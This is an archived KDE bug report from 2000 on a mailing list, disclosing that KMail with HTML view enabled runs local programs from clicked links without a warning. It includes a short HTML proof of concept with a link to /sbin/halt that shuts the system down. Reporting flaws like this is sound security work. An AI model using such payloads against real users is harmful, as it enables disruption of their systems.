[prev in list] [next in list] [prev in thread] [next in thread]
List: kde-bugs-dist
Subject: Bug#14253: kmail html security bug
From: TiloUlbrich () web ! de
Date: 2000-10-31 19:34:45
[Download RAW message or body]
Package: unknown
Version: KDE 2.0
Severity: normal
Installed from: SUSE 7.0 RPMs
Hi
I found a security bug KMail V 1.1.99 (KDE2.0).
Was the HTML-View for messages activated, a HTML-link can show to a local program, \
and KMail exec it, if i click the link. KMail exec it WITHOUT a warning (see Konqi; \
he shows a little yes/no question).
So it is possible to exec programms which needn't arguments. E.g "/sbin/halt" if I \
work with "root" were big shit.
It was a good thing to disable the HTML-View for default.
html code:
<html>
<body>
** SHUTDOWN ** (only root)<br>
<a href="/sbin/halt">
run "/sbin/halt"
</a>
<p></p>
<hr>
** KWRITE ** (all users)<br>
<a href="/opt/kde2/bin/kwrite">
run "/opt/kde2/bin/kwrite"
</a>
</body>
</html>
(submitted via bugs.kde.org)
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic